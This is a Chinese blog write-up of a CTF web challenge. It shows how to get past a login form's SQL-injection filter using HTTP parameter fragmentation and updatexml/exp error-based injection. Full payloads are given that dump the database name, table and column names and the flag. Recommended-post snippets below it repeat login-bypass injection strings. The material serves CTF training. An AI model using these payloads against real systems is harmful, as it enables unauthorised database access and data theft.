CTF-Web11(涉及SQL注入的绕过)

最新推荐文章于 2023-10-13 23:46:48 发布
最新推荐文章于 2023-10-13 23:46:48 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: CTF-Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39934520/article/details/108262256
版权

11.加了料的报错注入

                    

                   

先查看网页源代码,收集信息:

                                   

分析:

页面提示我们POSTusername与password两个参数,看了看源码,里面提示了我们sql语句

 $sql="select * from users where username='$username' and password='$password'";  

先随手post几个数试试,发现页面返回有四种形式,当输入admin,admin时返回Login failed,当输入admin',admin时发生报错,当输入admin' and '1'='1,admin时出现Sql injection detected,甚至输入(),admin返回了User name unknow error.,这就表明服务器端对输入字符进行了过滤,每当返回Sql injection detected就表明存在被过滤的字符或字符串。

首先手动测一下username过滤了些啥:‘=‘、‘;’、‘#’、‘,’、‘()’、‘-’、union,limit,substr,floor,mid我已经感觉username凉了,()都给滤了还玩个毛线

接着去看看password有没有希望:‘=’、‘;’、‘#’、‘-’、union、limit、substr,mid,floor,ExtractValue,updatexml

大佬还给我留了一个NAME_CONST,但=又被和谐了,这么一来根本没软用,好一道劝退题啊

但幸运的是没有过滤 or ,接下来我们接着测试:

 

(笔记注:1.这里要注意一点的是error_based_hpf 竟然是数据库,这是从后面的注入得出来的结果,所以说做CTF要特别注意一些字符串。2. 123()为什么报错会和前面两个不一样是因为函数怎么能以纯数字来命名并调用呢?)

这里有个hpf,hpf全称为HTTP Parameter Fragment,sql注入里有一种就叫http分割注入

payload:

username=' or updatexml/*&password=*/(1,concat(0x3a,(select database())),1) or '

这里username最后为 /* 而password最前面为*/  在拼接的时候就实现了/* */注释功能

这一题的意思就是在username过滤(),password过滤报错语句,因此我们要在username处使用报错语句,password处使用()

知道原理后开始操作:

暴库:

知道了库名之后接下来就是拿表,但由于这里和谐了limit,=与like,这里需要用regexp来代替= ,采用正则的方式来绕过,即利用regexp

username=' or updatexml/*&password=*/(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables where table_schema regexp database()),0x7e),1) or '

                           

爆字段:

username=' or updatexml/*&password=*/(1,concat(0x7e,(SELECT group_concat(column_name) FROM information_schema.columns where table_name regexp 'ffll44jj'),0x7e),1) or '

              

愉悦的去拿flag

username=' or updatexml/*&password=*/(1,concat(0x7e,(SELECT value FROM ffll44jj),0x7e),1) or '

  

虽然结果出来了,但还有另一种思路,题目没有过滤regexp,那么这里可以直接在password处采用exp报错

关于exp报错这里给出一个我所参考的链接:使用exp进行SQL报错注入: (网址)http://netsecurity.51cto.com/art/201508/489529.htm

之前已经知道了数据库名,那么我们直接来报表名:

username=0&password=' or exp(~(select*from (select group_concat(table_name) from information_schema.tables where table_schema regexp database() )x)) or '1

接着是列

username=0&password=' or exp(~(select*from (select group_concat(column_name) from information_schema.columns where table_name regexp 'ffll44jj' )x)) or '1

 

最后来dump数据:

username=0&password=' or exp(~(select*from (select value from ffll44jj )x)) or '1

 

最后的最后还有一种盲注,用脚本跑的,难度较大,有兴趣的可自行百度。

 

红烧兔纸
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透测试之攻破登录页面
qq_42801460的博客
03-30 5371
有些图形验证码加入的像素线条过于简单,使用图形验证码识别工具可以识别出每次更换的验证码,在平常的漏洞挖掘过程中,如果我们发现登录的验证码非常简单且易于识别,那我们就可以尝试使用自动化工具来进行登录破解了,如 PKAV 的 HTTP Fuzzer。当我们在做渗透测试时,无论厂商项目还是src众测项目,都会遇到给一堆登录系统的URL,然后让我们自己去测,能不能进去全看天的状况,本文将讲一下怎么突破这种封闭的web系统,从而进行更深层次的渗透 ,学完后你会发现,其实你就是系统管理员。
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF-web题之简单的SQL注入
qq_25046827的博客
11-24 4892
这两天闲着没事报名了学校信安和网安组织的网络安全大赛,靠着仅有的一点web知识做了几道web题,现在记录一下其中一道sql注入题的解题思路 首先题面如下 首先通过语句判断有多少个字段: 1' or 1=1 order by 4 # 1' or 1=1 order by 3 # order by是按by后面的数字或字段名所在列进行排序,如果结果集只有3列,order by4则会报错,故可以用来判断结果集的字段数 第一条语句报错,第二条语句返回 admin 5ef582761f2cafceebdfc8c
CTF-web学习大纲
最新发布
01-30
CTF-web学习大纲
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
CTF-网络挑战 使用PHP在Web中进行CTF挑战 链接: :
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
CTF-Web2-(简单绕过登录过滤)
→_→
07-14 1万+
登陆一下好吗?? 做CTF题时,不要忽略任何信息,要先收集信息,再分解信息,对于出题者的信息,不可全信,也不可不信,具体的来说就是要仔细分析,出题者的意图。 那么,根据这一题的信息,我们了解到这是一道过滤了某些字符的登录注入题型,为了进一步了解点击链接开始答题: 打开链接,我们就能看到一个很简单的一个登录页面,我们可以按F12查看前端代码,看是否有隐藏的信息,结果没有,接下来我们就要考虑给出的信息中提到过滤了一切,我们测试一下,看是否过滤了所有的字符: 点击登录: 从返回的信息.
ctfweb题目中的绕过登陆
weixin_42349846的博客
04-13 9054
1.后台登录 绕过登录获得FLAG cookie 登录网站的时候会产生cookie信息,通过获取cookie信息来绕过登录 用BP来获取数据包,通过删掉cookie信息来得到flag php在线执行工具:https://tool.lu/coderunner/ 2。简单的文件包含语句查询: e.g http://118.190.87.135:10080/?op=php://filter/con...
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 4259
以pikachu靶场练习来学习ctf知识
CTFSQL注入常见题型整理
热门推荐
test
10-10 11万+
前言 正文 无过滤带回显的情况 可能使用到的工具:firefox、hackbar for firfox、sqlmap for linux 手工注入 bugku的环境 在这一环境中的主要是通过post方式传入一个参数id来查询数据库内容。 首先判断sql语句闭合方式 当在id的值后面加上'时,界面无回显,可以判断后端的sql语句应该是 select xxxx from xxxx where...
ctfshow-WEB-web11( 利用session绕过登录验证)
wangyuxiang946的博客
09-06 1万+
ctf.show WEB模块第11关用session中保存的密码进行登录验证, 将 session中保存的密码清空即可绕过 页面中直接给了源码, 很明显是让我们进行代码审计,源码中将我们输入的密码与 session中保存的密码进行匹配, 两个password相同即可登录成功 右键检查或者按F12, 进入开发者模式, 查看浏览器的session, 后端代码就是拿这个session的value值与我们输入的密码进行匹配, 由于这个value值我没解密出来, 所以这里干脆一点, 直...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
{青少年CTF} POST&GET 详解
lfc18950509270的博客
07-26 146
这个时候,它又叫我们以post的方式提交,我们就需要用到一个插件了——HackBar。(关于HackBar的安装如果你们需要可以私聊我我发你们)于是这样就见到了我们最爱的flag了。一进来长这样,按照它的提示走就对了。
CTF学习第十五站——BugKu的POST与矛盾
qq_41174589的博客
10-13 139
因为在PHP中==会先进行类型转化在比较,如字符串与数字比较,会取字符串开头的数字与数字比较,开头无数字则取结果为0。将其发送到repeater,修改请求方式为POST,提交what=flag,得到flag。题目提示,若num不是一个数字,则展示num并判断num是否为1,若为1则给我们flag。what=flag无效,自相矛盾,我们尝试提交1,无反应,提交a,出现a。我们先利用burp抓包,发现其请求方式为GET。复制的时候别把你自己的1a复制进去了(偷笑。所以我们提交1a,得到flag。
一天一道CTF 第14天(Post变量)
scrawman的博客
03-24 249
[极客大挑战 2019]BuyFlag 在主页面的menu里找到PayFlag,查看源代码 提示我们要post两个变量password和money,password必须是404但不能是纯数字(老矛盾大师了),这里用的是php的弱类型比较,让password=404hhh,字符串跟数字比较的时候会自动截掉第一串数字之后的字符串。 bp抓包改成Cookie:user=1绕过第一道检测,让网站认为你是Cuiter。然后在repeater右上角Actions里change Request Method,请求体
青少年CTF训练平台 Web-Easy POST&GET
xingjinhao123的博客
10-17 567
青少年CTF训练平台 Web-Easy POST&GET
渗透测试--CTF--FLAG
qq_50034496的博客
12-06 5094
渗透测试--CTF--FLAG
BugKuCTF中套路满满的题-------login3(SKCTF)
qq_42133828的博客
02-09 2993
根据题目给的提示,无疑是基于bool的盲注,而关于盲注的一般都与脚本有关,毕竟很少人会去一个一个猜 然而,再用脚本解决这个问题时,也需要找到准确的注入语句,否则,白费。。。 首先进入页面一试用户名为admin,发现密码报错(说明此用户存在,那么关键的问题就是密码了。。): 再构造语句,进行几次的基于bool盲注的注入,查看一下有没有绕过一些特殊的语句 username='^(1)^1...
CTF-Web27(涉及请求头伪造--基础)
→_→
09-30 5141
27.貌似有点难 分析: <?php function GetIP(){ if(!empty($_SERVER["HTTP_CLIENT_IP"])) $cip = $_SERVER["HTTP_CLIENT_IP"]; else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) $cip = $_SERVER["HTTP_X_FORWARDED_FOR"]; else if(!empty($_SERVER["REMOT...
ctf sql注入题目
09-15
CTF(Capture The Flag)中的SQL注入题目提供了一个模拟真实情境下的网络安全挑战,旨在测试参与者对于SQL注入漏洞的理解和应用能力。以下是一些CTF SQL注入题目的例子: 1. BUUCTF-[极客大挑战 2019]EasySQL 这是一道较为简单的SQL注入题目,提供了一个特定的注入点,要求参与者利用SQL注入漏洞获取特定的信息或完成特定的任务。 2. CTFSHOW-sql注入(一) 这是CTFSHOW平台上的一个系列题目,主要介绍了SQL注入的基础知识点和常见题型。参与者可以通过完成不同的题目来逐步提升自己的SQL注入技能。 3. web 171(万能密码) 这是一个具有万能密码漏洞的网页应用题目。参与者需要在登录页面的密码字段中输入特定的注入payload,以绕过身份验证,获取敏感信息或进行其他未授权的操作。 4. web 172(过滤回显内容) 这是一个具有回显内容过滤漏洞的网页应用题目。参与者需要在输入框中构造特定的注入payload,以绕过过滤机制并成功回显注入结果。 这些题目的目的是帮助参与者了解、掌握和应用SQL注入漏洞的原理和技巧,提高其对于Web应用安全的认识和实践能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值